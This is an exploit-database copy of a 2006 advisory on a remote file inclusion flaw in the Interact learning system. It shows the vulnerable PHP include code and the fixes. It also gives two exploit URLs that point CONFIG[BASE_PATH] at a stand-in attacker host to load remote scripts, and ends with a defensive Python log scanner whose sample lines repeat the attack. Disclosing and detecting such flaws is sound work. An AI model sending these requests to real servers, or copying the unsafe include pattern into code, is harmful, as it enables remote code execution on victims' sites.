interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability

CVE: CVE-2007-2951
Category: CWE-98
Price: Not specified
Severity: High
Author: Ibid
Risk: High
Exploitation Type: Remote
Date: 2006-09-04
CPE: cpe:cpe:/a:interact:interact:2.2
PURL: pkg:pkg:exploit/interact-2-2-config-base-path-remote-file-include-vulnerability
CVSS: Not available
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080178

Below is a copy:

/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: Interact - Online Learning and Collaboration System v. 2.2.0
- [Script site: https://sourceforge.net/projects/cce-interact/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Found by: CarcaBot
+
-          Contact: CarcaBotx (at) yahoo (dot) com
-                        or
-          http://Hacking.CarcaBot.ro
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: CarcaBot
- http://Hacking.CarcaBot.ro
-
+
*/

/*

vulnerable code => admin/autoprompter.php line 33-38:
....
// When this script is requested directly, $CONFIG has not been loaded yet, so with
// register_globals on, $CONFIG['BASE_PATH'] can be supplied in the request.
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,
{$CONFIG['DB_PREFIX']}posts.subject,
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,
{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key
WHERE
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key
AND
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey
AND
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey
AND
{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL
{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND
{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY
{$CONFIG['DB_PREFIX']}posts.post_key");
....

Fix Exploit:

admin/autoprompter.php line 33-38:
....
// Load the site configuration first so that $CONFIG['BASE_PATH'] is assigned by
// the application before any path is built from it.
require_once('../local/config.inc.php');
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,
{$CONFIG['DB_PREFIX']}posts.subject,
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,
{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key
WHERE
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key
AND
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey
AND
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey
AND
{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL
{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND
{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY
{$CONFIG['DB_PREFIX']}posts.post_key");
....

vulnerable code => includes/common.inc.php line 35-40:
....
// ADODB_PATH is derived from BASE_PATH, so both require_once calls below follow
// whatever value BASE_PATH holds at this point.
$CONFIG['ADODB_PATH']    = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');
....

Exploit Fix:

includes/common.inc.php line 35-40:
....
// Load the site configuration before ADODB_PATH is built from BASE_PATH.
require_once('../local/config.inc.php');
$CONFIG['ADODB_PATH']    = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');

*/

#Exploit:

http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]

http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]

### End of File ###

### http://Hacking.CarcaBot.ro ###
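
A log check for the request pattern described in the advisory, as an added example (not part of the original advisory or of Interact's code): it flags requests whose query string sets a `CONFIG[...]` key and raises the verdict when the value starts with a URL scheme. The log lines, client addresses, host names and the `/interact` install path are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The two entry points named in the advisory.
ENTRY_POINTS = ("/admin/autoprompter.php", "/includes/common.inc.php")
# Request keys of the form CONFIG[...]; PHP variable names are case-sensitive.
CONFIG_KEY = re.compile(r"^CONFIG\[[^\]]*\]")
# Values that start with a stream-wrapper scheme (http://, ftp://, php://) or data:.
WRAPPER = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)
# Request line inside a common/combined access-log entry.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation addresses, made-up hosts and paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Sep/2006:10:00:01 +0000] "GET /interact/admin/autoprompter.php?CONFIG[BASE_PATH]=http://attacker.example/x.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [04/Sep/2006:10:00:05 +0000] "GET /interact/includes/common.inc.php?CONFIG%5BBASE_PATH%5D=ftp%3A%2F%2Fattacker.example%2Fx HTTP/1.1" 200 0',
    '192.0.2.12 - - [04/Sep/2006:10:01:00 +0000] "GET /interact/index.php?CONFIG[DB_PREFIX]=zz_ HTTP/1.1" 200 900',
    '192.0.2.13 - - [04/Sep/2006:10:02:00 +0000] "GET /interact/forum.php?url=http://example.org/ HTTP/1.1" 200 1200',
]


def classify(log_line):
    """Return (verdict, path, key, known_entry_point), or None for a clean line."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    known = target.path.endswith(ENTRY_POINTS)
    finding = None
    # parse_qsl percent-decodes keys and values, so CONFIG%5BBASE_PATH%5D is caught too.
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if not CONFIG_KEY.match(key):
            continue
        if WRAPPER.match(value):
            return ("remote-include-attempt", target.path, key, known)
        finding = finding or ("config-override", target.path, key, known)
    return finding


def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for verdict, path, key, known in scan(SAMPLE_LOG):
        print(f"{verdict:24} {path} {key} known_entry_point={known}")
```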
